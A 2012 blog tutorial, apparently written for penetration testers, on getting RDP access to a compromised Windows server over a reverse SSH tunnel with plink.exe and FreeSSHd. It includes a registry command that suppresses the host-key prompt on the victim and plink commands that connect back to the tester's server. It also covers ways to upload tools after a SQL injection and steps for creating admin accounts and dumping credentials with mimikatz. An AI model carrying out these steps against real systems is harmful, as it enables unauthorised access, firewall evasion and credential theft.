June 15, 2012
In this blog I’ll be providing instructions for establishing an RDP connection over a reverse SSH tunnel using plink.exe and FreeSSHd. I’ll also show how to do it without having to accept SSH server keys interactively, which can come in handy when pentesting. The methods outlined can also be used to tunnel other protocols over SSH connections in order traverse firewalls, but I thought RDP was one that people could use in many scenarios. This blog should be useful to penetration testers, admins, and any home users looking for a pseudo VPN solution.
The following steps will be covered:
- Install FreeSSHd
- Install PuTTY
- Configure Tunneling Options in FreeSSHd
- Create User Accounts in FreeSSHd
- Create the Key Pair for each User with PutTTYgen
- Test the FreeSSHd Configuration with PuTTY
- Add Registry Key to Remote Server (compromised server) with Reg
- Upload Plink.exe to the Remote Server (compromised server)
- Run Plink.exe on the Remote Server (compromised server)
- Access Tunneled RDP Session on Local Port via RDP Client
Note: I realize this would be easier to understand if their was an image, but I got a little lazy. Sorry about that. Hopefully it still makes sense. If you have any questions or comments feel free to contact me.
You can just as easily use some other Linux SSH server like OpenSSH (included in Backtrack, though you may have to enable it), but this blog is tuned for Windows users so I’ll be showing how to install and configured FreeSSHd. However, make sure you have the most recent version, because the older ones have a few security issues. I’ve provided basic installation instructions for FreeSSHd below:
- Download FreeSSHd from http://www.freesshd.com.
- Install it. However, I recommend not running it as a service. That way it won’t startup automatically. Unless, of course that’s what your looking for.
- Double-click the FreeSSHd icon on the desktop.
- The icon will appear on the Windows taskbar.
Configure Tunneling Options in FreeSSHd
Next, we want to make sure that our SSH server is configured to actually support tunneling. So below I’ve provided the basic instrucitons:
- Left-click the FreeSSHd taskbar icon to view the settings.
- Navigate to the “Authentication” tab.
- Set the “Public key folder” to the file system location where you store your public keys. This step really only applies if you’re planning to use public/private key pairs to authenticate to the server instead of a password.
- Set the “Password authentication” and “Public key authentication” options to “Allowed” by choosing the associated radio buttons.
- Press “Apply”.
- Navigate to the “Tunneling” tab.
- Ensure that the boxes next to “Allow local port forwarding” and “Allow remote port forwarding” are checked.
- Press “Apply”.
Create User Accounts in FreeSSHd
Alright, let’s create some users:
- Navigate to the “Users” tab.
- Click “Add” to create a new user.
- Enter the desired login and authentication information (password or key).
- Select all of the user options.
- Press “Apply”.
- Repeat as necessary for each user.
Create the Key Pair for Each User with PuTTYgen
Once again, this step only applies if you’re planning to use public/private keys pairs to authenticate. If your tunneling RDP over SSH as a pseudo VPN solution, it’s a good idea to steup a password protected key to authenticate to your SSH server. However, during a penetration test, it usually it makes more sense to use a password to authenticate.
- Download the PuTTY installer from http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html.
- Install PuTTY.
- Navigate to Start > All Program > PuTTY > PuTTYGen.
- Click “Generate”, and move the mouse around to create random values for the new key pair.
- When the generation is complete, the public key will be displayed in the top text area. Copy it to notepad, make sure it is on one line, and save it to a file.
- Name the file after the user it will be used for. Then move it to the public keys directory you defined in the FreeSSHd “Authentication” tab earlier.
- I’ve found that FreeSSHd can be a little flakey at times, so I recommend completely unloading and reloading FreeSSHd to make sure that all of your settings stick. I’ve noticed that simply restarting the SSHd server via the GUI doesn’t always do the trick.
Test the FreeSSHd Server Configuration with PuTTY
Especially, during a penetration test it’s a good idea to test out your configuration on the local LAN before trying it out on a compromised system. Below I’ve provided instrucitons for using PuTTY to test the account and FreeSSHd configuration.
- If you are using a key to authenticate, navigate to Start > All Program > PuTTY > Pageant. Pageant with open, and you can load your private key.
- Navigate to Start > All Programs > PuTTY > PuTTY. PuTTY will open.
- Enter the IP address of your FreeSSHd server, and press “Open”.
- You will be prompted to accept the key from the FreeSSHd server – accept it. The next time you log into the FreeSSHd server you’ll notice that you don’t have to accept it, because plink and PuTTY add a registry entry to track trusted hosts in Windows.
- If you configured your account to use a password, or a private key with a password, then you will need to provide it before gaining access to a shell.
- If you configured a private key without a password you should be provided a shell immediately after entering your username.
Add Registry Key to Remote Server (compromised server) with Reg
This step pretty much only applies to the penetration testers reading this blog. Remember a second ago when you had to accept the FreeSSHd server key before authenticating? Having that trust relationship is a requirement, and neither PuTTY or plink have a an option to suppress that check. That‘s a bit of a bummer for penetration testers, because in many attack scenarios we don’t have an interactive shell to work with. Have no fear though – Antti and I have come up with a work around.
As I mentioned in the previous steps, plink and PuTTY add a registry entry to track trusted hosts in Windows. So, we found that to supress the “do you trust this host” prompt, we can simply add the FreeSSHd host key to the registry on the compromised server using the reg command. As a result, we can initiate a reverse SSH session without an interactive shell. HuRay!
Below are the instructions for grabbing the registry entry from your system and installing it on the compromised server:
- Navigate to Start > Run .
- Type “regedit”.
- Navigate to HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys.
- Right-click and export the registry entry that was created when you accepted the FreeSSHd server key.
- Add the registry entry to the compromised server using the reg command. In the example below 192.168.1.100 is the FreeSSHd server IP address and 192.168.1.5 is the compromised server IP address.
Reg add KEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys /v rsa2@22:192.168.1.100 /t REG_SZ /d “0×23,0xcb2b55db55f787472197e10017fd3ef10a30987cbe1049375c4c9ac63df05
Ok, now that you’ve done all that, its time for a little full disclosure. I learned from my buddy HDESSER after I wrote this that someone already went through the trouble of writing an alternative plink client that does not prompt users to accept (cache) the host key. Its available at http://rc.quest.com/topics/putty/readme/#plinkopt. I recommend checking it out. If you use that instead of the original version you will not have to do the registry hack first.
Upload Plink.exe to the Remote Server (compromised server)
Now its time to upload plink.exe to the compromised server. Plink is a Windows SSH client that is part of the PuTTY installation package.
If your using key based authentiation then you should also upload your private key at this point. The method used to upload plink.exe may depend on the vulnerability that provided initial access to the compromised server, and the existing security controls. If you already have the ability to execute arbitrary commands on the remote server (compromised server) then uploading plink.exe shouldn’t be an issue. However, for those of you looking for somewhere to start, I’ve listed some common options below.
- Web upload forms (php, asp, aspx, cfm, cgi, etc) allow you to upload arbitrary files to the compromised server quickly without an interactive shell.
- FTP client and the “–s” script option allows you to download files to the compromised server from an FTP server easily without an interactive shell.
- MSSQL and xp_cmshell allow you to upload files via local commands, bulk inserts, powershell, etc. This is a nice option when executing the attacks via a SQL injection.
- TFTP server. Hopefully I don’t have to explain this one.
- Network shares can be used to upload file after being mounted using the net commands.
- If you already have an RDP session, but are looking to send one outside of the firewall then you can upload files via the shared clipboard and local drives.
- The Meterpreter shell upload command does exactly what it sounds like, but of course requires an existing meterpreter shell.
Run Plink.exe on the Remote Server (compromised server)
Almost there – Using the instructions below, start a reverse SSH tunnel that maps remote desktop port 3389 on the compromised server to port 12345 on the FreeSSHd server. In the example below 192.168.1.100 is the FreeSSHd server IP address (server) and 192.168.1.5 is the compromised server IP address (client).
plink.exe <SSH SERVER IP> -P 22 -C -R 127.0.0.1:12345:<CLIENT IP>:3389 -l netspi -pw letmein
plink.exe 192.168.1.100 -P 22 -C -R 127.0.0.1:12345:192.168.1.5:3389 -l test -pw password
Important Note: Please keep in mind that when traversing firewalls over the internet make sure to use your INTERNET facing IP address so the compromised server can actually connect back to your FreeSSHd server. Remember that some port forwarding may be required on your end. Finally, executing plink.exe with the at.exe or schtasks.exe command can be useful in some scenarios.
Access Tunneled RDP Session on Local Port via RDP Client
How does it feel? After like 10,000 steps your finally at the payoff. Are you excited? Be honest. Ok, ok -enough chatting, let’s finish this thing.
- If you don’t already have local credentials for the compromised system, now would be a good time to do one of the following things so you can actually log into your tunneled RDP connection:
- Create a local administrator account with the net user command.
- Dump unencrypted credentials with mimikatz.
- Dump and crack the local password hashes with smart_hashdump or fgdump.
- Dump passwords from files or the registry.
- Etc, etc, etc…
- Log into your FreeSSHd server locally or via RDP. Navigate to Start > Run.
- Type “mstsc” on the FreeSSHd server.
- Type “127.0.0.1:12345”
- Press enter.
- Enter your credentials to login.
- Ta – wait for it – da! - Now you have pretty screenshots for your reports!
It may not be the fastest option, but reverse SSH connections can be used to tunnel pretty much anything. Regardless of the protocol you’re tunneling, I recommend using the registry hack or modified plink executable during penetration tests to make life a little easier.
Finally, for those who are interested, I’ve listed a couple of links in the references section to blogs that provide instructions for using plink with metasploit. Have fun and hack responsibly.